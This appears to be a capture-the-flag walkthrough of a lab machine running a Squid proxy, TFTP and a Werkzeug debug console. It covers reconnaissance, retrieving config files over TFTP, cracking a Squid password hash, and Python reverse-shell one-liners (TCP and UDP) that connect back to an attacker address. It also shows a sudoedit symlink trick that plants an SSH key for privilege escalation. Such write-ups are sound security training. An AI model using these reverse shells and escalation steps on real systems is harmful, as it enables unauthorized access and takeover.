Starting with reconnaissance on host
10.10.10.21, using Nmap we have:
In parallel I fired UDP Proto Scanner and based on all the results there is the Squid proxy on port 3128 and tftp on port 69 open.
Finally, with Nikto
nikto -h http://10.10.10.21:3128 we get loads of results and all of them are false positives.
In order to access or scan the website we have to proxy our requests through Squid. There are a few ways of connecting/scanning using Squid proxy:
1. Using the metasploit module squid_pivot_scanning 2. Using nikto -h IP -useproxy http://10.10.10.21:3128 3. Using Burp Suite Upstream Proxy
However, in order to use Nikto or Burp we need to find Proxy Squid's credentials first.
So, searching for information about Squid Proxy I found 
and through TFTP (port 69) I got the squid.conf file using
get /etc/squid/squid.conf or just
get squid.conf, since we are in the squid directory.
Reading and searching online for password storage in Squid Proxy, I saw that there is a file located in
/etc/squid/passwords and in there you can store your Squid Proxy password. We have
kalamari:$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.lUsing John the Ripper and the rockyou.txt list to crack the basic auth password we get kalamari and ihateseafood. So now that we have the username and password lets move on to login and scan the host with Nikto. First of all, In burp you have to set up an upstream proxy to connect to the website through the squid proxy.
Now, we can access the host through 127.0.0.1.
You can also run Dirbuster.
Try to access 127.0.0.1 and you will see
http://127.0.0.1/console where you can execute python commands:
I tried passing a python reverse shell from Pentestmonkey 
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("ipaddress",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
but I experienced a lot of crashes and so I tried a reverse shell using udp:
import subprocess; subprocess.Popen(["python", "-c", 'import os; import pty; import socket; s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM); s.connect((\"ipaddress\", 443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv(\"HISTFILE\",\"/dev/null\"); pty.spawn(\"/bin/sh\"); s.close()'])
Normally, to catch a reverse udp connection I would use
nc -nlvup 443, but I used  instead, a reverse tty shell. This will allow me to use nano.
So, I am logged in as werkzeug and I need to escalate privileges to get to the user flag. If I fire
sudo -l I get:
Apparently, you can use sudoedit as alekos without password
sudoedit -u alekos /var/www/*/*/layout.html
The idea is to create a file in
/var/www/testing/x/layout.html, paste our ssh key to the path
/home/alekos/.ssh/authorized_keys and then login via ssh as the alekos user.
1. Create a folder in /var/www/testing/x and in there create a file named layout.html 2. We have /var/www/testing/x/layout.html 3. Create a symbolic link ln -s /var/www/testing/x/layout.html /home/alekos/.ssh/authorized_keys 4. Edit layout.html using sudoedit -u alekos /var/www/*/*/layout.html and add your ssh key
Now, in order to create our ssh key we need to:
1. Go to /root/.ssh 2. Type ssh-keygen via the terminal and hit enter (we do not need a passphrase) 3. Then cat the id_rsa.pub file and paste it in /var/www/testing/x/layout.html using nano
So, we can login through ssh
ssh -i id_rsa email@example.com and read the
To get root we need to follow the steps described in , 4.3 Tar arbitrary command execution.